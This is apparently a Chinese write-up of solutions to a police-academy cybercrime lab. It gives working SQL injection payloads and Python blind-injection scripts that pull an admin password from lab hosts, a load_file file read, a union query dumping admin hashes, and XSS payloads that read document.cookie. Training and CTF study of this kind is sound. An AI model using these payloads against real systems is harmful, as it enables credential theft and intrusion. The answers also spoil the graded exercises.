山警网络犯罪侦查实训

本意是帮侦查的师姐完成一下作业，结果发现有的题目真不错，遂整理一篇题解

攻防技能专项训练

SQL注入

level3

过滤了单引号，不能用万能密码，我们用SQL中的转义字符将admin后面的单引号转义为字符串里面的内容

-- 原始查询
SELECT * FROM users WHERE username='admin' AND password='123456';

-- 单引号被过滤后，可利用反斜杠转义闭合
username=admin\&password=or 1=1#
-- 拼接结果
SELECT * FROM users WHERE username='admin\' AND password=or 1=1#';

level5

报错注入，前端没有回显，需要抓包

15 AND updatexml(1,concat(0x7e,(SELECT password FROM tw_admin WHERE username='李晓晓'),0x7e),1)

level6

布尔盲注，我们写一个脚本

import requests

url = 'https://scene-udqc7v98uosuyz1l-web-3000.zcsz02.sdpc.edu.cn/query'
str_range = ':-abcdefghijklmnopqrstuvwxyz0123456789'

def getData(str_list):
    j = 1
    while True:
        for i in str_list:
            payload=f"15 and substr((select group_concat(password) from tw_admin where username='李晓晓'),{j},1)='{i}'"
            data={"id":payload}
            r = requests.post(url,data=data)
            if "1616683585" in r.text:
                print(i, end="")
                if i == ":":
                    print()
                    return 1
                break
        j = j + 1

if __name__ == '__main__':
    getData(str_range)

level7

时间盲注

import requests
import time
import sys

url = "https://scene-ijza6xey20aw15i2-web-3000.zcsz02.sdpc.edu.cn/"

def time_query(payload, threshold=1.5):
    start = time.time()
    try:
        r = requests.post(url + "check", data={"id": payload}, timeout=15)
        elapsed = time.time() - start
        return elapsed >= threshold, elapsed
    except Exception as e:
        return False, 0

def extract_char(query, pos):
    """使用二分查找提取单个字符"""
    low, high = 32, 126
    while low < high:
        mid = (low + high) // 2
        payload = f"15 AND IF(ASCII(SUBSTRING(({query}),{pos},1))>{mid},SLEEP(2),0)"
        is_delay, _ = time_query(payload)
        if is_delay:
            low = mid + 1
        else:
            high = mid
    return chr(low)

print("="*60)
print("[*] Extracting 李晓晓's password from tw_admin table")
print("="*60)

# 获取密码长度
print("\n[*] Finding password length...")
pwd_len = 0
for l in range(1, 100):
    payload = f"15 AND IF(LENGTH((SELECT password FROM tw_admin WHERE username='李晓晓'))={l},SLEEP(2),0)"
    is_delay, _ = time_query(payload)
    if is_delay:
        pwd_len = l
        print(f"[+] Password length: {l}")
        break

if pwd_len == 0:
    print("[-] Could not determine password length")
    sys.exit(1)

# 获取密码
print(f"\n[*] Extracting password ({pwd_len} chars)...")
password = ""
for i in range(1, pwd_len + 1):
    c = extract_char("SELECT password FROM tw_admin WHERE username='李晓晓'", i)
    password += c
    sys.stdout.write(c)
    sys.stdout.flush()

print(f"\n\n" + "="*60)
print(f"[+] 李晓晓's password hash: {password}")
print("="*60)

level8

利用SQL注入读文件，这里前端不会显示，要抓包

id=15 union select 2,4,5,6,7,8,9,1,2,3,4,5,load_file('/home/lixiaoxiao/passwd.txt'),1,2

得到

102,108,97,103,58,101,97,102,102,49,51,52,99,50,101,99,101,102,54,48,48,57,54,97,50,57,49,50,99,97,50,52,54,50,49,56,50,58,10

应该是ascii码，转换一下

flag:eaff134c2ecef60096a2912ca2462182:

level9

我们先去github上找一下这个项目

题目上说的漏洞文件在这里，也就是/admin/Six/Get_Odds_1.php

1' union select 1,2,3,4,5,6,group_concat(login_pwd) from sys_admin #

得到admin用户哈希，破解可得密码是120708

XSS漏洞

level1

题目给出了一个有xss漏洞的地址，直接找有回显的参数注入即可

level2

<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	</head>
	<body>
	<script type='text/javascript'>document.domain=location.host;_ret={"_res":2};try{parent.jsonp123456(_ret);}catch(err){jsonp123456(_ret);}</script>此页面的callback参数存在缺陷，尝试构造一下吧！
	</body>
	</html>

漏洞点在直接调用了callback参数里面的函数，直接callback=alert(document.cookie)

level3

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
</head>
<body>
请输入您的姓名: <input type="text" value="hello,nosugar"></input></body>
</html>

我们直接闭合属性，注入事件

word=" onfocus="alert(document.cookie)" autofocus="